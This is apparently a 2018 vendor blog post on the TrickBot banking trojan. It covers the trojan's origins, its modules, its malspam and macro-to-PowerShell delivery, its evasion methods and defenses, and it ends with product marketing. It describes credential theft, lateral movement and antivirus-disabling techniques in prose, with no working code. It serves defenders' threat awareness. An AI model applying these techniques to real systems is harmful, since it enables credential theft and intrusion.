Barkly vs Malware
Barkly Research
Oct 2018

TrickBot Banking Trojan Takes Center Stage in 2018

trickbot-2018

Photo by Farhan Siddicq

With a constant slew of attack campaigns and iterations, TrickBot has become one of the year's most active and versatile threats. Let's take a look at the many tricks the malware has up its sleeves.

Something strange happened in November 2015. The prolific group behind the Dyre banking trojan, responsible for a long string of brazen cyber attacks costing financial institutions tens of millions, had mysteriously fallen silent. Later, when it was revealed Russian authorities had conducted a raid on the group and arrested many of its members, security experts speculated whether the remaining elements of the operation would resurface and how the gap left by Dyre's sudden absence would be filled.

They didn't have to speculate for long. Ten months later, researchers at Fidelis Security discovered a new strain of malware circulating with striking similarities to Dyre. It's name — TrickBot. 

Over the ensuing two years, it has become one of the most pervasive and actively updated banking trojans in operation. The latest surge in TrickBot activity has even prompted the National Cyber Security Centre to issue an advisory warning organizations to prepare for themselves for attacks by implementing mitigations immediately.

Modular mayhem: Trickbot was built for rapid iteration

From the start, TrickBot (like Dyre) has been built around the use of modules or plugins. Each of these modules provides a distinct capability (ex: a system info-harvesting module, a webinjects module, etc.), and they can easily be swapped in and out. This modular approach has provided TrickBot authors with the flexibility to customize attacks and continuously experiment with a wide variety of techniques and capabilities.

In general, the modules have been designed around conducting core attack activities — system reconnaissance, evasion, data-stealing, lateral movement — all in support of the ultimate goal of gaining access to the victim's bank and other financial accounts.

To illustrate the breadth of TrickBot capabilities and how frequently new modules are introduced, below is a list of primary TrickBot modules listed in order of their discovery. Some of these modules appear consistently (ex: systeminfo, injectdll, mailsearcher), while others appear to be swapped in and out. Because TrickBot gains persistence on infected machines, new modules can also be delivered to existing victims at any time as they are developed. As a result, infections can take different shapes week to week and existing infections can evolve over time (some have even progressed to involve ransomware). 

List of documented TrickBot modules

Systeminfo

  • Date documented: Sept 2016
  • Purpose: Reconnaissance. Harvests system info to give attackers better understanding of the systems they've infected. 

InjectDll

  • Date documented: Oct 2016
  • Purpose: Data stealing. This is the core banking trojan module. It's responsible for using webinjects that come into play when victims visit banking or other financial websites, adding extra fields to website forms, changing website wording and messaging, or triggering convincing-looking pop-up forms in real-time in order to capture credentials. 

Mailsearcher

  • Date documented: Dec 2016
  • Purpose: Reconnaissance. Combs through all the files on each disk in the system and compares them against a list of file extensions

WormDll and ShareDll

  • Date documented: July 2017 and September 2017
  • Purpose: Lateral movement. These modules are meant to be used in tandem with one another to spread TrickBot locally via Server Message Block (SMB) and Lightweight Directory Access Protocol (LDAP) queries. 

ModuleDll/ImportDll

  • Date documented: Aug 2017
  • Purpose: Data stealing. Creates a hidden virtual instance of the victim's desktop and harvests browser data such as cookies, browsing history, plugins, etc

OutlookDll

  • Date documented: Aug 2017
  • Purpose: Data stealing. Attempts to harvest harvest saved Outlook credentials by querying several registry keys.

DomainDll

  • Date documented: Dec 2017
  • Purpose: Data stealing. Uses LDAP in attempt to harvest credentials and configuration data from domain controller by accessing shared SYSVOL files.

TabDll (contains additional modules listed below)

  • Date documented: March 2018
    • Spreader module
      • Purpose: Lateral movement. Attempts to spread via leaked NSA exploit EternalRomance.
    • Screenlocker module
      • Purpose: Data Stealing. Locks screen to capture victim login credentials.  

NetworkDll

  • Date documented: April 2018
  • Purpose: Reconnaissance. Attempts to gather a wide variety of information about the infected system and its network.

SqulDLL

  • Date documented: April 2018
  • Purpose: Data stealing. Harvests credentials from SQL servers as well as from the infected machine's memory by force-enabling WDigest authentication then utilizing the popular tool Mimikatz to scrape credentials stored in LSASS.  

hVNC module

  • Date documented: May 2018
  • Purpose: Data stealing. Creates a hidden virtual instance of the victim's desktop, but instead of harvesting browser data, remotely views and controls victim's system. 

Latest TrickBot campaigns

In addition to releasing new modules on a near-monthly basis, TrickBot's authors issue new versions of the malware's XML configuration file on average three to four times a week. Not only do the updates help the file routinely sneak past signature-matching antivirus solutions, they also allow the attackers to regularly experiment with additional evasive techniques. We'll investigate some of the most recent ones below. 

How TrickBot is currently being delivered 

TrickBot is presently being distributed via malspam campaigns with malicious Word, Excel, or PDF documents attached. These files are typically disguised as invoices or other business-related documents (ex: payroll records, financial statements, etc.), and they are often sent from a domain that can be easily misidentified as a legitimate company's. 

A good recent example can be found at MyOnlineSecurity, which regularly identifies and shares details on TrickBot campaigns

trickbot-invoice-email

TrickBot malspam disguised as Intuit invoice notification. Source: MyOnlineSecurity


Using domains like "invoice-intuit.co.uk" is a classic spam tactic, but to a recipient in a rush, the email could easily appear to be a legitimate message from Intuit. 

Once opened, the Excel spreadsheet attachment prompts the recipient to "enable content" in order to view the document correctly. Doing so launches a malicious macro that in turn utilizes PowerShell to retrieve the TrickBot payload from a C2 server. 

TrickBot-fake-invoice-excel

Fake invoice Excel document prompting user to enable macros

TrickBot-PowerShell-command

PowerShell command launched via macro and cmd.exe. Downloads and executes TrickBot payload (vtjxvbxj.exe)


With multiple campaigns being launched on a weekly basis, attackers have had plenty of opportunity to experiment with countless variations of this general pattern, some more unique than others. 

For example, a TrickBot campaign Cyberbit analyzed in August delivered a Word document that would only execute its macro if the user zoomed in/out of the document. 

Researchers theorized the behavior may have been designed to help the malware evade sandboxes, though it also likely lowered the likelihood of successful infections considerably. 

In addition, TrickBot has also relied heavily on distribution via Emotet, which has become an extremely prevalent and damaging malware downloader

Emotet-2018-activity-chart

Emotet has become a prevalent threat, often delivering TrickBot. Source: Malwarebytes

Other evasive tricks up TrickBot's sleeves

  • Anti-analysis: Many of today's malware variants are programed to avoid scenarios where they might be caught in a sandbox, and TrickBot is no different. In addition to "sleeping" for various amounts of time it also runs several checks to ensure it hasn't landed in a virtual environment. 

  • Process hollowing: TrickBot samples have also been known to utilize a code injection technique called process hollowing, which involves creating a suspended process, swapping out its memory with malicious code, and resuming the process to initiate the malware's execution. Though the technique can be used to bypass many security tools, Barkly blocks it.

  • Disabling antivirus: Stopping TrickBot infection attempts before they have a chance to start is key, because once the trojan has a foothold one of the first things it does is attempt to disable popular security solutions such as Windows Defender, Sophos, and Malwarebytes

Protecting your company from TrickBot

The following best practices can help you reduce your risk of TrickBot landing in and spreading throughout your network:  

Because TrickBot is distributed primarily via malicious Word and Excel documents, the standard best practices for securing Microsoft Office apply, too.

You can also stay up-to-date on latest TrickBot activity and campaigns by referring to the following great sources of information: 

Blocking TrickBot with Barkly

Trick-doc

Barkly prevents the malicious macro from launching PowerShell, blocking the retrieval of TrickBot from the start.


With TrickBot becoming an increasingly prevalent threat it's crucial for organizations to adopt security solutions and practices that can help them stay ahead of relentlessly iterative attacks. 

Barkly addresses that challenge with two strong, complementary approaches:

  1. Machine learning-powered detection engines that get trained on the very latest malware samples on a nightly basis. 
  2. Behavior-based protection designed to block the fundamental tactics that today's attacks rely on (such as attempting to utilize malicious Office documents or process hollowing). 

As a result, not only does Barkly block TrickBot executables, it prevents them from even touching machines to begin with. 

TrickBot-diagram-Barkly

Click to expand


Learn how Barkly can help you replace your antivirus with stronger, smarter protection
. 

Want to see Barkly in action for yourself? See a demo.  

Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.

lock-white.png

Don't be the last to know about new attacks

Join a group of 10,000 IT and security pros who get clear, actionable takes on malware and infosec news.

Subscribe

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.